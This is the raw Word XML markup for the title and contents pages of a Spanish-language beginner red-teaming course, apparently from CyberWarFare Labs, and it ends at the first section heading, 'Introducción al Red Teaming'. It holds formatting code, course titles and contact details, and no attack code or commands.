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3221" w14:textId="410CE1ED" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5320"/>
          <w:tab w:val="left" w:pos="13614"/>
        </w:tabs>
        <w:ind w:left="1090"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:position w:val="109"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:noProof/>
          <w:position w:val="109"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7DA0589F" wp14:editId="0B74C227">
                <wp:extent cx="2489200" cy="19050"/>
                <wp:effectExtent l="9525" t="0" r="635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9050"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="2489200" cy="19050"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="4" name="Graphic 4"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="9525"/>
                            <a:ext cx="2489200" cy="1270"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="l" t="t" r="r" b="b"/>
                            <a:pathLst>
                              <a:path w="2489200">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="2488819" y="0"/>
                                </a:lnTo>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:ln w="19050">
                            <a:solidFill>
                              <a:srgbClr val="0D0D0D"/>
                            </a:solidFill>
                            <a:prstDash val="solid"/>
                          </a:ln>
                        </wps:spPr>
                        <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:prstTxWarp prst="textNoShape">
                            <a:avLst/>
                          </a:prstTxWarp>
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                    </wpg:wgp>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:group w14:anchorId="3A8402B5" id="Group 3" o:spid="_x0000_s1026" style="width:196pt;height:1.5pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="248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">
                <v:shape id="Graphic 4" o:spid="_x0000_s1027" style="position:absolute;top:95;width:24892;height:12;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="248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" path="m,l2488819,e" filled="f" strokecolor="#0d0d0d" strokeweight="1.5pt">
                  <v:path arrowok="t"/>
                </v:shape>
                <w10:anchorlock/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:position w:val="109"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="19490559" wp14:editId="215EDD22">
            <wp:extent cx="5007699" cy="11881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007699" cy="1188148"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:noProof/>
          <w:position w:val="109"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4F5624DD" wp14:editId="36D0FF03">
                <wp:extent cx="2489200" cy="19050"/>
                <wp:effectExtent l="9525" t="0" r="635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9050"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="2489200" cy="19050"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="7" name="Graphic 7"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="9525"/>
                            <a:ext cx="2489200" cy="1270"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="l" t="t" r="r" b="b"/>
                            <a:pathLst>
                              <a:path w="2489200">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="2488818"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E8B0D9" id="Group 6" o:spid="_x0000_s1026" style="width:196pt;height:1.5pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="248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">
                <v:shape id="Graphic 7" o:spid="_x0000_s1027" style="position:absolute;top:95;width:24892;height:12;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="248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" path="m,l2488818,e" filled="f" strokeweight="1.5pt">
                  <v:path arrowok="t"/>
                </v:shape>
                <w10:anchorlock/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="305013BA" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="168"/>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588864" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0AD3EFEF" wp14:editId="7FA84F21">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>1813560</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>268477</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="8825865" cy="306641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5865" cy="3066415"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="B34512"/>
                        </a:solidFill>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="6E403FCD" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:before="906" w:line="352" w:lineRule="auto"/>
                              <w:ind w:left="3979" w:right="2602" w:hanging="1369"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Calibri Light"/>
                                <w:color w:val="000000"/>
                                <w:sz w:val="80"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Calibri Light"/>
                                <w:color w:val="FFFFFF"/>
                                <w:spacing w:val="-4"/>
                                <w:sz w:val="80"/>
                              </w:rPr>
                              <w:t>EQUIPO ROJO PARA PRINCIPIANTES: MATERIAL DEL CURSO</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shapetype w14:anchorId="0AD3EFEF" id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
                <v:stroke joinstyle="miter"/>
                <v:path gradientshapeok="t" o:connecttype="rect"/>
              </v:shapetype>
              <v:shape id="Textbox 8" o:spid="_x0000_s1026" type="#_x0000_t202" style="position:absolute;margin-left:142.8pt;margin-top:21.15pt;width:694.95pt;height:241.4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" fillcolor="#b34512" stroked="f">
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="6E403FCD" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:before="906" w:line="352" w:lineRule="auto"/>
                        <w:ind w:left="3979" w:right="2602" w:hanging="1369"/>
                        <w:rPr>
                          <w:rFonts w:ascii="Calibri Light"/>
                          <w:color w:val="000000"/>
                          <w:sz w:val="80"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Calibri Light"/>
                          <w:color w:val="FFFFFF"/>
                          <w:spacing w:val="-4"/>
                          <w:sz w:val="80"/>
                        </w:rPr>
                        <w:t>EQUIPO ROJO PARA PRINCIPIANTES: MATERIAL DEL CURSO</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B118417" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A051EB4" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7177A9A4" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16B3F902" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="80"/>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7589376" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="76F0A4BD" wp14:editId="08ECDB54">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>402209</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>212077</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2614295" cy="65278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4295" cy="652780"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="2614295" cy="652780"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="10" name="Image 10"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId9" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="3175" y="3175"/>
                            <a:ext cx="2607564" cy="646176"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <wps:wsp>
                        <wps:cNvPr id="11" name="Textbox 11"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3175" y="3175"/>
                            <a:ext cx="2607945" cy="646430"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln w="6350">
                            <a:solidFill>
                              <a:srgbClr val="A4A4A4"/>
                            </a:solidFill>
                            <a:prstDash val="solid"/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="74D4AA0B" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                              <w:pPr>
                                <w:spacing w:before="61" w:line="436" w:lineRule="exact"/>
                                <w:ind w:left="375"/>
                                <w:rPr>
                                  <w:b/>
                                  <w:sz w:val="36"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:b/>
                                  <w:spacing w:val="-2"/>
                                  <w:sz w:val="36"/>
                                </w:rPr>
                                <w:t>ARCHIVOS DE CYBERWARFARE:</w:t>
                              </w:r>
                            </w:p>
                            <w:p w14:paraId="1D8C60A2" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                              <w:pPr>
                                <w:spacing w:line="436" w:lineRule="exact"/>
                                <w:ind w:left="223"/>
                                <w:rPr>
                                  <w:sz w:val="36"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:spacing w:val="-2"/>
                                  <w:sz w:val="36"/>
                                </w:rPr>
                                <w:t>https://cyberwarfare.live</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                    </wpg:wgp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:group w14:anchorId="76F0A4BD" id="Group 9" o:spid="_x0000_s1027" style="position:absolute;margin-left:31.65pt;margin-top:16.7pt;width:205.85pt;height:51.4pt;z-index:-15727104;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page" coordsize="26142,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31;top:31;width:26076;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">
                  <v:imagedata r:id="rId10" o:title=""/>
                </v:shape>
                <v:shape id="Textbox 11" o:spid="_x0000_s1029" type="#_x0000_t202" style="position:absolute;left:31;top:31;width:26080;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" filled="f" strokecolor="#a4a4a4" strokeweight=".5pt">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="74D4AA0B" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                        <w:pPr>
                          <w:spacing w:before="61" w:line="436" w:lineRule="exact"/>
                          <w:ind w:left="375"/>
                          <w:rPr>
                            <w:b/>
                            <w:sz w:val="36"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:b/>
                            <w:spacing w:val="-2"/>
                            <w:sz w:val="36"/>
                          </w:rPr>
                          <w:t>ARCHIVOS DE CYBERWARFARE:</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="1D8C60A2" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                        <w:pPr>
                          <w:spacing w:line="436" w:lineRule="exact"/>
                          <w:ind w:left="223"/>
                          <w:rPr>
                            <w:sz w:val="36"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:spacing w:val="-2"/>
                            <w:sz w:val="36"/>
                          </w:rPr>
                          <w:t>https://cyberwarfare.live</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="487589888" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="01A6D1F4" wp14:editId="77D12619">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>8150225</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>346189</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3757295" cy="65278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295" cy="652780"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="3757295" cy="652780"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="13" name="Image 13"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId11" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="3175" y="3175"/>
                            <a:ext cx="3750563" cy="646176"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <wps:wsp>
                        <wps:cNvPr id="14" name="Textbox 14"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3175" y="3175"/>
                            <a:ext cx="3750945" cy="646430"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln w="6350">
                            <a:solidFill>
                              <a:srgbClr val="A4A4A4"/>
                            </a:solidFill>
                            <a:prstDash val="solid"/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="6D4AFCB3" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                              <w:pPr>
                                <w:spacing w:before="61" w:line="436" w:lineRule="exact"/>
                                <w:ind w:left="2" w:right="2"/>
                                <w:jc w:val="center"/>
                                <w:rPr>
                                  <w:sz w:val="36"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:b/>
                                  <w:sz w:val="36"/>
                                </w:rPr>
                                <w:t>Correo electrónico</w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:sz w:val="36"/>
                                </w:rPr>
                                <w:t xml:space="preserve">: </w:t>
                              </w:r>
                              <w:hyperlink r:id="rId12">
                                <w:r>
                                  <w:rPr>
                                    <w:color w:val="0462C1"/>
                                    <w:spacing w:val="-2"/>
                                    <w:sz w:val="36"/>
                                    <w:u w:val="single" w:color="0462C1"/>
                                  </w:rPr>
                                  <w:t>support@cyberwarfare.live</w:t>
                                </w:r>
                              </w:hyperlink>
                            </w:p>
                            <w:p w14:paraId="70CD4BE5" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                              <w:pPr>
                                <w:spacing w:line="436" w:lineRule="exact"/>
                                <w:ind w:left="2"/>
                                <w:jc w:val="center"/>
                                <w:rPr>
                                  <w:b/>
                                  <w:sz w:val="36"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:b/>
                                  <w:spacing w:val="-2"/>
                                  <w:sz w:val="36"/>
                                </w:rPr>
                                <w:t>CCRTA</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                    </wpg:wgp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:group w14:anchorId="01A6D1F4" id="Group 12" o:spid="_x0000_s1030" style="position:absolute;margin-left:641.75pt;margin-top:27.25pt;width:295.85pt;height:51.4pt;z-index:-15726592;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page" coordsize="37572,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">
                <v:shape id="Image 13" o:spid="_x0000_s1031" type="#_x0000_t75" style="position:absolute;left:31;top:31;width:37506;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">
                  <v:imagedata r:id="rId13" o:title=""/>
                </v:shape>
                <v:shape id="Textbox 14" o:spid="_x0000_s1032" type="#_x0000_t202" style="position:absolute;left:31;top:31;width:37510;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" filled="f" strokecolor="#a4a4a4" strokeweight=".5pt">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="6D4AFCB3" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                        <w:pPr>
                          <w:spacing w:before="61" w:line="436" w:lineRule="exact"/>
                          <w:ind w:left="2" w:right="2"/>
                          <w:jc w:val="center"/>
                          <w:rPr>
                            <w:sz w:val="36"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:b/>
                            <w:sz w:val="36"/>
                          </w:rPr>
                          <w:t>Correo electrónico</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:sz w:val="36"/>
                          </w:rPr>
                          <w:t xml:space="preserve">: </w:t>
                        </w:r>
                        <w:hyperlink r:id="rId14">
                          <w:r>
                            <w:rPr>
                              <w:color w:val="0462C1"/>
                              <w:spacing w:val="-2"/>
                              <w:sz w:val="36"/>
                              <w:u w:val="single" w:color="0462C1"/>
                            </w:rPr>
                            <w:t>support@cyberwarfare.live</w:t>
                          </w:r>
                        </w:hyperlink>
                      </w:p>
                      <w:p w14:paraId="70CD4BE5" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                        <w:pPr>
                          <w:spacing w:line="436" w:lineRule="exact"/>
                          <w:ind w:left="2"/>
                          <w:jc w:val="center"/>
                          <w:rPr>
                            <w:b/>
                            <w:sz w:val="36"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:b/>
                            <w:spacing w:val="-2"/>
                            <w:sz w:val="36"/>
                          </w:rPr>
                          <w:t>CCRTA</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="11648218" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:footerReference w:type="default" r:id="rId15"/>
          <w:type w:val="continuous"/>
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="560" w:right="0" w:bottom="480" w:left="0" w:header="0" w:footer="298" w:gutter="0"/>
          <w:pgNumType w:start="1"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57DF8751"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1200" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2DAF9095" wp14:editId="434A811D">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>0</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>0</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="12192000" cy="11938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16" name="Graphic 16"/>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17" name="Textbox 17"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="12192000" cy="1193800"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="1774095B" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                              <w:pPr>
                                <w:spacing w:before="391"/>
                                <w:ind w:left="1"/>
                                <w:jc w:val="center"/>
                                <w:rPr>
                                  <w:sz w:val="88"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:color w:val="FFFFFF"/>
                                  <w:sz w:val="88"/>
                                </w:rPr>
                                <w:t>CONTENIDO DEL CURSO</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                    </wpg:wgp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:group w14:anchorId="2DAF9095" id="Group 15" o:spid="_x0000_s1033" style="position:absolute;margin-left:0;margin-top:0;width:960pt;height:94pt;z-index:15731200;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">
                <v:shape id="Graphic 16" o:spid="_x0000_s1034"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" path="m12192000,l,,,1193291r12192000,l12192000,xe" fillcolor="#b34512" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Textbox 17" o:spid="_x0000_s1035"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74095B" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                        <w:pPr>
                          <w:spacing w:before="391"/>
                          <w:ind w:left="1"/>
                          <w:jc w:val="center"/>
                          <w:rPr>
                            <w:sz w:val="88"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:color w:val="FFFFFF"/>
                            <w:sz w:val="88"/>
                          </w:rPr>
                          <w:t>CONTENIDO DEL CURSO</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <w10:wrap anchorx="page" anchory="page"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="35571BE6" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69D6087D" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53109D9E" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F7B9A0E" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Ttulo6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2270"/>
        </w:tabs>
        <w:ind w:hanging="811"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Introducción al Red Teaming</w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D1D4E5" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="83"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
